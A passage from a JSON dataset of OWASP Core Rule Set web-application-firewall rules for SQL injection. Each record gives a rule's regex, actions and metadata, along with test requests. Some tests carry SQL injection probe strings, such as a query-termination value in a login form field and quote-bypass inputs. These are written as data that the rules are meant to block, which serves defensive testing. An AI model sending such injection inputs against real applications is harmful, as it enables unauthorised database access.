"act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1829 } }, { "rule_id": "942511", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:'(?:(?:[\\w\\s=_\\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)')", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQLi bypass attempt by ticks detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQLi bypass detected: quotes", "test_id": 1, "request": { "method": "GET", "uri": "/get?`bla`", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942511 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "`bla`" } ] }, { "description": "SQLi bypass detected: quotes", "test_id": 2, "request": { "method": "GET", "uri": "/get?'bla'", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942511 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "'bla'" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1877, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:'(?:(?:[\\w\\s=_\\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)')", "actions": [ { "act_name": "id", "lineno": 1878, "act_quote": "no_quote", "act_arg": "942511", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1879, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1880, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1881, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1882, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1882, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1883, "act_quote": "quotes", "act_arg": "SQLi bypass attempt by ticks detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1884, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1885, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1886, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1887, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1888, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1889, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1890, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1891, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1892, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1893, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1894, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1895, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1896, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1877 } }, { "rule_id": "942530", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "';", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQLi query termination detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects SQL query termination with ';", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin@juice-sh.op';&password=foo" }, "expected": { "should_block": true, "rule_ids": [ 942530 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin@juice-sh.op';&password=foo" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1906, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "';", "actions": [ { "act_name": "id", "lineno": 1907, "act_quote": "no_quote", "act_arg": "942530", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1908, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1909, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1910, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1911, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1911, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1912, "act_quote": "quotes", "act_arg": "SQLi query termination detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1913, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1914, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1915, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1916, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1917, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1918, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1919, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1920, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1921, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1922, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1923, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1924, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1925, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1906 } }, { "rule_id": "942017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1928, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 1928, "act_quote": "no_quote", "act_arg": "942017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1928, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1928, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1928, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1928, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1928, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1928, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1928 } }, { "rule_id": "942018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1929, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 1929, "act_quote": "no_quote", "act_arg": "942018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1929, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1929, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1929, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1929, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1929, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1929, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1929 } }, { "rule_id": "942421", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){3})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)", "logdata": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/4", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "Cookie": "cookie=@@@@@@@@@@@@@", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942421 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1940, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){3})", "actions": [ { "act_name": "id", "lineno": 1941, "act_quote": "no_quote", "act_arg": "942421", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1942, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1943, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1944, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1945, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1945, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1946, "act_quote": "quotes", "act_arg": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1947, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1948, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1949, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1950, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1951, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1952, "act_quote": "quotes", "act_arg": "paranoia-level/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1953, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1954, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1955, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1956, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1957, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1958, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1959, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1940 } }, { "rule_id": "942432", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){2})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)", "logdata": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/4", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=;;dd foo bar" }, "expected": { "should_block": true, "rule_ids": [ 942432 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=;;dd foo bar" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1969, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){2})", "actions": [ { "act_name": "id", "lineno": 1970, "act_quote": "no_quote", "act_arg": "942432", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1971, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1972, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1973, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1974, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1974, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1975, "act_quote": "quotes", "act_arg": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1976, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1977, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1978, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1979, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1980, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1981, "act_quote": "quotes", "act_arg": "paranoia-level/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1982, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1983, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1984, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1985, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1986, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1987, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1988, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1969 } }, { "rule_id": "943011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 17, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "943011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 17, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 17, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 17 } }, { "rule_id": "943012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 18, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 18, "act_quote": "no_quote", "act_arg": "943012", 